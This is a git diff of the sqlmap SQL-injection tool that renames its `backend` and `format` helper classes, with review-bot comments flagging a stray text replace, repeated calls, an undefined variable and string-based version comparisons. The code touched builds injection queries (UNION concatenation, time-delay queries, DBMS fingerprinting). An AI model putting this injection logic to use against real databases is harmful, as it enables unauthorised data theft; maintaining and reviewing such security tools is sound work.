diff --git a/extra/gprof2dot/gprof2dot.py b/extra/gprof2dot/gprof2dot.py
index b9571473b..8978b8e93 100755
--- a/extra/gprof2dot/gprof2dot.py
+++ b/extra/gprof2dot/gprof2dot.py
@@ -1036,7 +1036,7 @@ class CallgrindParser(LineParser):
"""Parser for valgrind's callgrind tool.
See also:
- - http://valgrind.org/docs/manual/cl-format.html
+ - http://valgrind.org/docs/manual/cl-Format.html
"""
_call_re = re.compile('^calls=\s*(\d+)\s+((\d+|\+\d+|-\d+|\*)\s+)+$')
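Review bot: The `format` → `Format` rename appears to have been applied as a plain text replace, and it changed this docstring URL to `cl-Format.html`; URL paths are usually case-sensitive, so the link likely no longer resolves and the line should stay `- http://valgrind.org/docs/manual/cl-format.html`. The same replace altered ordinary prose in the `extra/xdot/xdot.py` module docstring (`xdot Format`) and in the `__saveCmdline` docstring in `lib/core/option.py` (`INI file Format.`). Both `extra/` files look like bundled third-party code, so those two hunks are best dropped from the commit. Limiting the rename to the identifiers imported from `lib.core.common` avoids all three.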
diff --git a/extra/xdot/xdot.py b/extra/xdot/xdot.py
index 42bc060cb..4bc94640e 100644
--- a/extra/xdot/xdot.py
+++ b/extra/xdot/xdot.py
@@ -16,7 +16,7 @@
# along with this program. If not, see .
#
-'''Visualize dot graphs via the xdot format.'''
+'''Visualize dot graphs via the xdot Format.'''
__author__ = "Jose Fonseca"
diff --git a/lib/controller/action.py b/lib/controller/action.py
index 8989f6929..597fff194 100644
--- a/lib/controller/action.py
+++ b/lib/controller/action.py
@@ -8,8 +8,8 @@ See the file 'doc/COPYING' for copying permission
"""
from lib.controller.handler import setHandler
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import dataToStdout
from lib.core.data import conf
from lib.core.data import kb
@@ -31,8 +31,8 @@ def action():
# system to be able to go ahead with the injection
setHandler()
- if not backend.getDbms() or not conf.dbmsHandler:
- htmlParsed = format.getErrorParsedDBMSes()
+ if not Backend.getDbms() or not conf.dbmsHandler:
+ htmlParsed = Format.getErrorParsedDBMSes()
errMsg = "sqlmap was not able to fingerprint the "
errMsg += "back-end database management system"
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 60fc7bd49..793ef8166 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -13,11 +13,11 @@ import time
from lib.core.agent import agent
from lib.core.common import aliasToDbmsEnum
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import beep
from lib.core.common import extractRegexResult
from lib.core.common import findDynamicContent
-from lib.core.common import format
+from lib.core.common import Format
from lib.core.common import getComparePageRatio
from lib.core.common import getCompiledRegex
from lib.core.common import getSortedInjectionTests
@@ -140,19 +140,19 @@ def checkSqlInjection(place, parameter, value):
continue
- if len(backend.getErrorParsedDBMSes()) > 0 and dbms not in backend.getErrorParsedDBMSes() and kb.skipOthersDbms is None:
+ if len(Backend.getErrorParsedDBMSes()) > 0 and dbms not in Backend.getErrorParsedDBMSes() and kb.skipOthersDbms is None:
msg = "parsed error message(s) showed that the "
- msg += "back-end DBMS could be %s. " % format.getErrorParsedDBMSes()
+ msg += "back-end DBMS could be %s. " % Format.getErrorParsedDBMSes()
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
if conf.realTest or readInput(msg, default="Y") in ("y", "Y"):
- kb.skipOthersDbms = backend.getErrorParsedDBMSes()
+ kb.skipOthersDbms = Backend.getErrorParsedDBMSes()
if kb.skipOthersDbms and dbms not in kb.skipOthersDbms:
debugMsg = "skipping test '%s' because " % title
debugMsg += "the parsed error message(s) showed "
debugMsg += "that the back-end DBMS could be "
- debugMsg += "%s" % format.getErrorParsedDBMSes()
+ debugMsg += "%s" % Format.getErrorParsedDBMSes()
logger.debug(debugMsg)
continue
@@ -350,7 +350,7 @@ def checkSqlInjection(place, parameter, value):
# Force back-end DBMS according to the current
# test value for proper payload unescaping
- backend.forceDbms(dbms)
+ Backend.forceDbms(dbms)
# Skip test if the user provided custom column
# range and this is not a custom UNION test
@@ -362,7 +362,7 @@ def checkSqlInjection(place, parameter, value):
configUnion(test.request.char, test.request.columns)
- if not backend.getIdentifiedDbms():
+ if not Backend.getIdentifiedDbms():
warnMsg = "using unescaped version of the test "
warnMsg += "because of zero knowledge of the "
warnMsg += "back-end DBMS"
@@ -382,7 +382,7 @@ def checkSqlInjection(place, parameter, value):
where = vector[6]
# Reset forced back-end DBMS value
- backend.flushForcedDbms()
+ Backend.flushForcedDbms()
# If the injection test was successful feed the injection
# object with the test's details
@@ -421,11 +421,11 @@ def checkSqlInjection(place, parameter, value):
if hasattr(test, "details"):
for dKey, dValue in test.details.items():
if dKey == "dbms":
- injection.dbms = backend.setDbms(dValue)
+ injection.dbms = Backend.setDbms(dValue)
elif dKey == "dbms_version" and injection.dbms_version is None:
- injection.dbms_version = backend.setVersion(dValue)
+ injection.dbms_version = Backend.setVersion(dValue)
elif dKey == "os" and injection.os is None:
- injection.os = backend.setOs(dValue)
+ injection.os = Backend.setOs(dValue)
if conf.beep or conf.realTest:
beep()
@@ -488,7 +488,7 @@ def heuristicCheckSqlInjection(place, parameter):
infoMsg += "parameter '%s' might " % parameter
if result:
- infoMsg += "be injectable (possible DBMS: %s)" % (format.getErrorParsedDBMSes() or UNKNOWN_DBMS_VERSION)
+ infoMsg += "be injectable (possible DBMS: %s)" % (Format.getErrorParsedDBMSes() or UNKNOWN_DBMS_VERSION)
logger.info(infoMsg)
else:
infoMsg += "not be injectable"
diff --git a/lib/controller/handler.py b/lib/controller/handler.py
index 5ff5bb68b..e4ee8a5af 100644
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -7,7 +7,7 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.data import conf
@@ -63,11 +63,11 @@ def setHandler():
( SYBASE_ALIASES, SybaseMap, SybaseConn ),
]
- if backend.getIdentifiedDbms() is not None:
+ if Backend.getIdentifiedDbms() is not None:
for i in xrange(len(dbmsObj)):
dbmsAliases, _, _ = dbmsObj[i]
- if backend.getIdentifiedDbms().lower() in dbmsAliases:
+ if Backend.getIdentifiedDbms().lower() in dbmsAliases:
if i > 0:
pushValue(dbmsObj[i])
dbmsObj.remove(dbmsObj[i])
@@ -102,4 +102,4 @@ def setHandler():
# At this point back-end DBMS is correctly fingerprinted, no need
# to enforce it anymore
- backend.flushForcedDbms()
+ Backend.flushForcedDbms()
diff --git a/lib/core/agent.py b/lib/core/agent.py
index e64d7c7f4..9fa48e8aa 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -11,7 +11,7 @@ import re
from xml.etree import ElementTree as ET
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getCompiledRegex
from lib.core.common import isDBMSVersionAtLeast
from lib.core.common import isTechniqueAvailable
@@ -222,8 +222,8 @@ class Agent:
payload = payload.replace("[ORIGVALUE]", origvalue)
if "[INFERENCE]" in payload:
- if backend.getIdentifiedDbms() is not None:
- inference = queries[backend.getIdentifiedDbms()].inference
+ if Backend.getIdentifiedDbms() is not None:
+ inference = queries[Backend.getIdentifiedDbms()].inference
if "dbms_version" in inference:
if isDBMSVersionAtLeast(inference.dbms_version):
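Review bot: `Backend.getIdentifiedDbms()` is evaluated twice in a row here, once for the `is not None` test and again as the `queries` key, and each call re-runs the forced/fingerprinted/configured fallback chain with several `aliasToDbmsEnum` lookups. Binding it once, `dbms = Backend.getIdentifiedDbms()` followed by `if dbms is not None: inference = queries[dbms].inference`, reads better and guarantees the test and the lookup see the same value. The same pattern recurs in later hunks of this file (the CAST/ISNULL branch, the `FROM_TABLE` checks, the limit-query branches and the `case` lookup) and in `getDelayQuery` in `lib/core/common.py`. The enclosing method starts and ends outside this hunk.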
@@ -281,17 +281,17 @@ class Agent:
# SQLite version 2 does not support neither CAST() nor IFNULL(),
# introduced only in SQLite version 3
- if backend.getIdentifiedDbms() == DBMS.SQLITE:
+ if Backend.getIdentifiedDbms() == DBMS.SQLITE:
return field
if field.startswith("(CASE"):
nulledCastedField = field
else:
- nulledCastedField = queries[backend.getIdentifiedDbms()].cast.query % field
- if backend.getIdentifiedDbms() == DBMS.ACCESS:
- nulledCastedField = queries[backend.getIdentifiedDbms()].isnull.query % (nulledCastedField, nulledCastedField)
+ nulledCastedField = queries[Backend.getIdentifiedDbms()].cast.query % field
+ if Backend.getIdentifiedDbms() == DBMS.ACCESS:
+ nulledCastedField = queries[Backend.getIdentifiedDbms()].isnull.query % (nulledCastedField, nulledCastedField)
else:
- nulledCastedField = queries[backend.getIdentifiedDbms()].isnull.query % nulledCastedField
+ nulledCastedField = queries[Backend.getIdentifiedDbms()].isnull.query % nulledCastedField
return nulledCastedField
@@ -325,7 +325,7 @@ class Agent:
@rtype: C{str}
"""
- if not backend.getDbms():
+ if not Backend.getDbms():
return fields
if fields.startswith("(CASE"):
@@ -333,7 +333,7 @@ class Agent:
else:
fields = fields.replace(", ", ",")
fieldsSplitted = fields.split(",")
- dbmsDelimiter = queries[backend.getIdentifiedDbms()].delimiter.query
+ dbmsDelimiter = queries[Backend.getIdentifiedDbms()].delimiter.query
nulledCastedFields = []
for field in fieldsSplitted:
@@ -396,13 +396,13 @@ class Agent:
def simpleConcatQuery(self, query1, query2):
concatenatedQuery = ""
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
concatenatedQuery = "CONCAT(%s,%s)" % (query1, query2)
- elif backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE):
+ elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE):
concatenatedQuery = "%s||%s" % (query1, query2)
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
concatenatedQuery = "%s+%s" % (query1, query2)
return concatenatedQuery
@@ -444,7 +444,7 @@ class Agent:
concatenatedQuery = query
fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsSelectTop, fieldsSelectCase, _, fieldsToCastStr, fieldsExists = self.getFields(query)
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.misc.start, 1)
concatenatedQuery += ",'%s')" % kb.misc.stop
@@ -460,7 +460,7 @@ class Agent:
elif fieldsNoSelect:
concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.misc.start, concatenatedQuery, kb.misc.stop)
- elif backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE):
+ elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE):
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.misc.start, 1)
concatenatedQuery += "||'%s'" % kb.misc.stop
@@ -476,7 +476,7 @@ class Agent:
elif fieldsNoSelect:
concatenatedQuery = "'%s'||%s||'%s'" % (kb.misc.start, concatenatedQuery, kb.misc.stop)
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.misc.start, 1)
concatenatedQuery += "+'%s'" % kb.misc.stop
@@ -545,8 +545,8 @@ class Agent:
intoRegExp = intoRegExp.group(1)
query = query[:query.index(intoRegExp)]
- if backend.getIdentifiedDbms() in FROM_TABLE and inbandQuery.endswith(FROM_TABLE[backend.getIdentifiedDbms()]):
- inbandQuery = inbandQuery[:-len(FROM_TABLE[backend.getIdentifiedDbms()])]
+ if Backend.getIdentifiedDbms() in FROM_TABLE and inbandQuery.endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
+ inbandQuery = inbandQuery[:-len(FROM_TABLE[Backend.getIdentifiedDbms()])]
for element in range(0, count):
if element > 0:
@@ -565,9 +565,9 @@ class Agent:
conditionIndex = query.index(" FROM ")
inbandQuery += query[conditionIndex:]
- if backend.getIdentifiedDbms() in FROM_TABLE:
+ if Backend.getIdentifiedDbms() in FROM_TABLE:
if " FROM " not in inbandQuery or "(CASE " in inbandQuery:
- inbandQuery += FROM_TABLE[backend.getIdentifiedDbms()]
+ inbandQuery += FROM_TABLE[Backend.getIdentifiedDbms()]
if intoRegExp:
inbandQuery += intoRegExp
@@ -584,8 +584,8 @@ class Agent:
else:
inbandQuery += char
- if backend.getIdentifiedDbms() in FROM_TABLE:
- inbandQuery += FROM_TABLE[backend.getIdentifiedDbms()]
+ if Backend.getIdentifiedDbms() in FROM_TABLE:
+ inbandQuery += FROM_TABLE[Backend.getIdentifiedDbms()]
inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)
@@ -614,21 +614,21 @@ class Agent:
"""
limitedQuery = query
- limitStr = queries[backend.getIdentifiedDbms()].limit.query
+ limitStr = queries[Backend.getIdentifiedDbms()].limit.query
fromIndex = limitedQuery.index(" FROM ")
untilFrom = limitedQuery[:fromIndex]
fromFrom = limitedQuery[fromIndex+1:]
orderBy = False
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE):
- limitStr = queries[backend.getIdentifiedDbms()].limit.query % (num, 1)
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE):
+ limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
limitedQuery += " %s" % limitStr
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
- limitStr = queries[backend.getIdentifiedDbms()].limit.query % (num+1, num+1)
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num+1, num+1)
limitedQuery += " %s" % limitStr
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
if " ORDER BY " in limitedQuery and "(SELECT " in limitedQuery:
orderBy = limitedQuery[limitedQuery.index(" ORDER BY "):]
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
@@ -640,7 +640,7 @@ class Agent:
limitedQuery = limitedQuery % fromFrom
limitedQuery += "=%d" % (num + 1)
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
forgeNotIn = True
if " ORDER BY " in limitedQuery:
@@ -654,7 +654,7 @@ class Agent:
limitedQuery = limitedQuery.replace("DISTINCT %s" % notDistinct, notDistinct)
if limitedQuery.startswith("SELECT TOP ") or limitedQuery.startswith("TOP "):
- topNums = re.search(queries[backend.getIdentifiedDbms()].limitregexp.query, limitedQuery, re.I)
+ topNums = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, limitedQuery, re.I)
if topNums:
topNums = topNums.groups()
@@ -700,8 +700,8 @@ class Agent:
@rtype: C{str}
"""
- if backend.getIdentifiedDbms() is not None and hasattr(queries[backend.getIdentifiedDbms()], "case"):
- return queries[backend.getIdentifiedDbms()].case.query % expression
+ if Backend.getIdentifiedDbms() is not None and hasattr(queries[Backend.getIdentifiedDbms()], "case"):
+ return queries[Backend.getIdentifiedDbms()].case.query % expression
else:
return expression
diff --git a/lib/core/common.py b/lib/core/common.py
index 27987118b..ea80be9e7 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -127,6 +127,279 @@ class DynamicContentItem:
self.lineContentBefore = lineContentBefore
self.lineContentAfter = lineContentAfter
+class Format:
+ @staticmethod
+ def humanize(values, chain=" or "):
+ strJoin = "|".join([v for v in values])
+
+ return strJoin.replace("|", chain)
+
+ # Get methods
+ @staticmethod
+ def getDbms(versions=None):
+ """
+ Format the back-end DBMS fingerprint value and return its
+ values formatted as a human readable string.
+
+ @return: detected back-end DBMS based upon fingerprint techniques.
+ @rtype: C{str}
+ """
+
+ if versions is None and Backend.getVersionList():
+ versions = Backend.getVersionList()
+
+ if versions is None:
+ return Backend.getDbms()
+ else:
+ return "%s %s" % (Backend.getDbms(), " and ".join([v for v in versions]))
+
+ @staticmethod
+ def getErrorParsedDBMSes():
+ """
+ Parses the knowledge base htmlFp list and return its values
+ formatted as a human readable string.
+
+ @return: list of possible back-end DBMS based upon error messages
+ parsing.
+ @rtype: C{str}
+ """
+
+ htmlParsed = ""
+
+ if len(kb.htmlFp) == 0:
+ return None
+ elif len(kb.htmlFp) == 1:
+ htmlParsed = kb.htmlFp[0]
+ elif len(kb.htmlFp) > 1:
+ htmlParsed = " or ".join([htmlFp for htmlFp in kb.htmlFp])
+
+ return htmlParsed
+
+ @staticmethod
+ def getOs(target, info):
+ """
+ Formats the back-end operating system fingerprint value
+ and return its values formatted as a human readable string.
+
+ Example of info (kb.headersFp) dictionary:
+
+ {
+ 'distrib': set(['Ubuntu']),
+ 'type': set(['Linux']),
+ 'technology': set(['PHP 5.2.6', 'Apache 2.2.9']),
+ 'release': set(['8.10'])
+ }
+
+ Example of info (kb.bannerFp) dictionary:
+
+ {
+ 'sp': set(['Service Pack 4']),
+ 'dbmsVersion': '8.00.194',
+ 'dbmsServicePack': '0',
+ 'distrib': set(['2000']),
+ 'dbmsRelease': '2000',
+ 'type': set(['Windows'])
+ }
+
+ @return: detected back-end operating system based upon fingerprint
+ techniques.
+ @rtype: C{str}
+ """
+
+ infoStr = ""
+
+ if info and "type" in info:
+ infoStr += "%s operating system: %s" % (target, Format.humanize(info["type"]))
+
+ if "distrib" in info:
+ infoStr += " %s" % Format.humanize(info["distrib"])
+
+ if "release" in info:
+ infoStr += " %s" % Format.humanize(info["release"])
+
+ if "sp" in info:
+ infoStr += " %s" % Format.humanize(info["sp"])
+
+ if "codename" in info:
+ infoStr += " (%s)" % Format.humanize(info["codename"])
+
+ if "technology" in info:
+ infoStr += "\nweb application technology: %s" % Format.humanize(info["technology"], ", ")
+
+ return infoStr
+
+class Backend:
+ # Set methods
+ @staticmethod
+ def setDbms(dbms):
+ dbms = aliasToDbmsEnum(dbms)
+
+ if dbms is None:
+ return None
+
+ # Little precaution, in theory this condition should always be false
+ elif kb.dbms is not None and kb.dbms != dbms:
+ msg = "sqlmap previously fingerprinted back-end DBMS "
+ msg += "%s. However now it has been fingerprinted " % kb.dbms
+ msg += "to be %s. " % dbms
+ msg += "Please, specify which DBMS is "
+ msg += "correct [%s (default)/%s] " % (kb.dbms, dbms)
+
+ while True:
+ inp = readInput(msg, default=kb.dbms)
+
+ if aliasToDbmsEnum(inp) == kb.dbms:
+ break
+ elif aliasToDbmsEnum(inp) == dbms:
+ kb.dbms = aliasToDbmsEnum(inp)
+ break
+ else:
+ warnMsg = "invalid value"
+ logger.warn(warnMsg)
+
+ elif kb.dbms is None:
+ kb.dbms = aliasToDbmsEnum(dbms)
+
+ return kb.dbms
+
+ @staticmethod
+ def setVersion(version):
+ if isinstance(version, basestring):
+ kb.dbmsVersion = [ version ]
+
+ return kb.dbmsVersion
+
+ @staticmethod
+ def setVersionList(versionsList):
+ if isinstance(versionsList, list):
+ kb.dbmsVersion = versionsList
+ elif isinstance(version, basestring):
+ Backend.setVersion(versionsList)
+ else:
+ logger.error("invalid format of versionsList")
+
+ @staticmethod
+ def forceDbms(dbms):
+ kb.misc.forcedDbms = aliasToDbmsEnum(dbms)
+
+ @staticmethod
+ def flushForcedDbms():
+ kb.misc.forcedDbms = None
+
+ @staticmethod
+ def setOs(os):
+ if os is None:
+ return None
+
+ # Little precaution, in theory this condition should always be false
+ elif kb.os is not None and kb.os != os:
+ msg = "sqlmap previously fingerprinted back-end DBMS "
+ msg += "operating system %s. However now it has " % kb.os
+ msg += "been fingerprinted to be %s. " % os
+ msg += "Please, specify which OS is "
+ msg += "correct [%s (default)/%s] " % (kb.os, os)
+
+ while True:
+ inp = readInput(msg, default=kb.os)
+
+ if inp == kb.os:
+ break
+ elif inp == os:
+ kb.os = inp
+ break
+ else:
+ warnMsg = "invalid value"
+ logger.warn(warnMsg)
+
+ elif kb.os is None:
+ kb.os = os
+
+ return kb.os
+
+ # Get methods
+ @staticmethod
+ def getForcedDbms():
+ return aliasToDbmsEnum(kb.misc.forcedDbms)
+
+ @staticmethod
+ def getDbms():
+ return aliasToDbmsEnum(kb.dbms)
+
+ @staticmethod
+ def getErrorParsedDBMSes():
+ """
+ Returns array with parsed DBMS names till now
+
+ This functions is called to:
+
+ 1. Sort the tests, getSortedInjectionTests() - detection phase.
+ 2. Ask user whether or not skip specific DBMS tests in detection phase,
+ lib/controller/checks.py - detection phase.
+ 3. Sort the fingerprint of the DBMS, lib/controller/handler.py -
+ fingerprint phase.
+ """
+
+ return kb.htmlFp
+
+ @staticmethod
+ def getIdentifiedDbms():
+ dbms = None
+
+ if Backend.getForcedDbms() is not None:
+ dbms = Backend.getForcedDbms()
+ elif Backend.getDbms() is not None:
+ dbms = kb.dbms
+ elif conf.dbms is not None:
+ dbms = conf.dbms
+ elif len(Backend.getErrorParsedDBMSes()) > 0:
+ dbms = Backend.getErrorParsedDBMSes()[0]
+
+ return aliasToDbmsEnum(dbms)
+
+ @staticmethod
+ def getVersion():
+ if len(kb.dbmsVersion) > 0:
+ return kb.dbmsVersion[0]
+ else:
+ return None
+
+ @staticmethod
+ def getVersionList():
+ if len(kb.dbmsVersion) > 0:
+ return kb.dbmsVersion
+ else:
+ return None
+
+ # Comparison methods
+ @staticmethod
+ def isDbms(dbms):
+ return Backend.getDbms() is not None and Backend.getDbms() == aliasToDbmsEnum(dbms)
+
+ @staticmethod
+ def isDbmsWithin(aliases):
+ return Backend.getDbms() is not None and Backend.getDbms().lower() in aliases
+
+ @staticmethod
+ def isVersion(version):
+ return Backend.getVersion() is not None and Backend.getVersion() == version
+
+ @staticmethod
+ def isVersionWithin(versionList):
+ if Backend.getVersionList() is None:
+ return False
+
+ for dbmsVersion in Backend.getVersionList():
+ if dbmsVersion == UNKNOWN_DBMS_VERSION:
+ continue
+ elif dbmsVersion in versionList:
+ return True
+
+ return False
+
+ @staticmethod
+ def isVersionGreaterOrEqualThan(version):
+ return Backend.getVersion() is not None and str(Backend.getVersion()) >= str(version)
+
def paramToDict(place, parameters=None):
"""
Split the parameters into names and values, check if these parameters
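Review bot: `Backend.setVersionList` tests `isinstance(version, basestring)` in its `elif`, but the parameter is named `versionsList` and no `version` name is visible in that scope, so a non-list argument would raise `NameError` instead of reaching `setVersion` or the error log. The class is moved here unchanged from the old `backend`, which makes the rename a good moment to fix it: `elif isinstance(versionsList, basestring):`. `resumeConfKb` in `lib/core/session.py` passes `dbmsVersion` to this method, presumably restored from the session file, so the string branch looks reachable. Separately, neither new class has a docstring, and `Format.humanize` could be `chain.join(values)` rather than joining on `|` and replacing, which also rewrites any value that itself contains `|`.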
@@ -512,14 +785,14 @@ def parsePasswordHash(password):
if not password or password == " ":
password = "NULL"
- if backend.getIdentifiedDbms() == DBMS.MSSQL and password != "NULL" and isHexEncodedString(password):
+ if Backend.getIdentifiedDbms() == DBMS.MSSQL and password != "NULL" and isHexEncodedString(password):
hexPassword = password
password = "%s\n" % hexPassword
password += "%sheader: %s\n" % (blank, hexPassword[:6])
password += "%ssalt: %s\n" % (blank, hexPassword[6:14])
password += "%smixedcase: %s\n" % (blank, hexPassword[14:54])
- if not backend.isVersionWithin(("2005", "2008")):
+ if not Backend.isVersionWithin(("2005", "2008")):
password += "%suppercase: %s" % (blank, hexPassword[54:])
return password
@@ -817,25 +1090,25 @@ def parseUnionPage(output, expression, partial=False, condition=None, sort=True)
def getDelayQuery(andCond=False):
query = None
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
if not kb.data.banner:
conf.dbmsHandler.getVersionFromBanner()
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
- if banVer is None or (backend.getIdentifiedDbms() == DBMS.MYSQL and banVer >= "5.0.12") or (backend.getIdentifiedDbms() == DBMS.PGSQL and banVer >= "8.2"):
- query = queries[backend.getIdentifiedDbms()].timedelay.query % conf.timeSec
+ if banVer is None or (Backend.getIdentifiedDbms() == DBMS.MYSQL and banVer >= "5.0.12") or (Backend.getIdentifiedDbms() == DBMS.PGSQL and banVer >= "8.2"):
+ query = queries[Backend.getIdentifiedDbms()].timedelay.query % conf.timeSec
else:
- query = queries[backend.getIdentifiedDbms()].timedelay.query2 % conf.timeSec
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
- query = queries[backend.getIdentifiedDbms()].timedelay.query
+ query = queries[Backend.getIdentifiedDbms()].timedelay.query2 % conf.timeSec
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ query = queries[Backend.getIdentifiedDbms()].timedelay.query
else:
- query = queries[backend.getIdentifiedDbms()].timedelay.query % conf.timeSec
+ query = queries[Backend.getIdentifiedDbms()].timedelay.query % conf.timeSec
if andCond:
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.SQLITE ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.SQLITE ):
query = query.replace("SELECT ", "")
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
query = "(%s)>0" % query
return query
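Review bot: `banVer >= "5.0.12"` and `banVer >= "8.2"` compare version strings lexicographically, so a banner version such as `5.0.2` sorts above `5.0.12` and `10.0` sorts below `8.2`, which would pick the wrong `timedelay` query variant for those servers. Comparing parsed numeric components, for example `tuple(int(p) for p in banVer.split("."))` against `(5, 0, 12)`, avoids this, provided non-numeric banner parts are handled. `Backend.isVersionGreaterOrEqualThan`, added earlier in this file, has the same weakness through `str(Backend.getVersion()) >= str(version)`.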
@@ -1791,8 +2064,8 @@ def isDBMSVersionAtLeast(version):
retVal = None
- if backend.getVersion() and backend.getVersion() != UNKNOWN_DBMS_VERSION:
- value = backend.getVersion().replace(" ", "").rstrip('.')
+ if Backend.getVersion() and Backend.getVersion() != UNKNOWN_DBMS_VERSION:
+ value = Backend.getVersion().replace(" ", "").rstrip('.')
while True:
index = value.find('.', value.find('.') + 1)
@@ -1910,14 +2183,14 @@ def getSortedInjectionTests():
retVal = SORTORDER.LAST
elif 'details' in test and 'dbms' in test.details:
- if test.details.dbms in backend.getErrorParsedDBMSes():
+ if test.details.dbms in Backend.getErrorParsedDBMSes():
retVal = SORTORDER.SECOND
else:
retVal = SORTORDER.THIRD
return retVal
- if backend.getErrorParsedDBMSes():
+ if Backend.getErrorParsedDBMSes():
retVal = sorted(retVal, key=priorityFunction)
return retVal
@@ -1955,279 +2228,6 @@ def unicodeToSafeHTMLValue(value):
return retVal
-class format:
- @staticmethod
- def humanize(values, chain=" or "):
- strJoin = "|".join([v for v in values])
-
- return strJoin.replace("|", chain)
-
- # Get methods
- @staticmethod
- def getDbms(versions=None):
- """
- Format the back-end DBMS fingerprint value and return its
- values formatted as a human readable string.
-
- @return: detected back-end DBMS based upon fingerprint techniques.
- @rtype: C{str}
- """
-
- if versions is None and backend.getVersionList():
- versions = backend.getVersionList()
-
- if versions is None:
- return backend.getDbms()
- else:
- return "%s %s" % (backend.getDbms(), " and ".join([v for v in versions]))
-
- @staticmethod
- def getErrorParsedDBMSes():
- """
- Parses the knowledge base htmlFp list and return its values
- formatted as a human readable string.
-
- @return: list of possible back-end DBMS based upon error messages
- parsing.
- @rtype: C{str}
- """
-
- htmlParsed = ""
-
- if len(kb.htmlFp) == 0:
- return None
- elif len(kb.htmlFp) == 1:
- htmlParsed = kb.htmlFp[0]
- elif len(kb.htmlFp) > 1:
- htmlParsed = " or ".join([htmlFp for htmlFp in kb.htmlFp])
-
- return htmlParsed
-
- @staticmethod
- def getOs(target, info):
- """
- Formats the back-end operating system fingerprint value
- and return its values formatted as a human readable string.
-
- Example of info (kb.headersFp) dictionary:
-
- {
- 'distrib': set(['Ubuntu']),
- 'type': set(['Linux']),
- 'technology': set(['PHP 5.2.6', 'Apache 2.2.9']),
- 'release': set(['8.10'])
- }
-
- Example of info (kb.bannerFp) dictionary:
-
- {
- 'sp': set(['Service Pack 4']),
- 'dbmsVersion': '8.00.194',
- 'dbmsServicePack': '0',
- 'distrib': set(['2000']),
- 'dbmsRelease': '2000',
- 'type': set(['Windows'])
- }
-
- @return: detected back-end operating system based upon fingerprint
- techniques.
- @rtype: C{str}
- """
-
- infoStr = ""
-
- if info and "type" in info:
- infoStr += "%s operating system: %s" % (target, format.humanize(info["type"]))
-
- if "distrib" in info:
- infoStr += " %s" % format.humanize(info["distrib"])
-
- if "release" in info:
- infoStr += " %s" % format.humanize(info["release"])
-
- if "sp" in info:
- infoStr += " %s" % format.humanize(info["sp"])
-
- if "codename" in info:
- infoStr += " (%s)" % format.humanize(info["codename"])
-
- if "technology" in info:
- infoStr += "\nweb application technology: %s" % format.humanize(info["technology"], ", ")
-
- return infoStr
-
-class backend:
- # Set methods
- @staticmethod
- def setDbms(dbms):
- dbms = aliasToDbmsEnum(dbms)
-
- if dbms is None:
- return None
-
- # Little precaution, in theory this condition should always be false
- elif kb.dbms is not None and kb.dbms != dbms:
- msg = "sqlmap previously fingerprinted back-end DBMS "
- msg += "%s. However now it has been fingerprinted " % kb.dbms
- msg += "to be %s. " % dbms
- msg += "Please, specify which DBMS is "
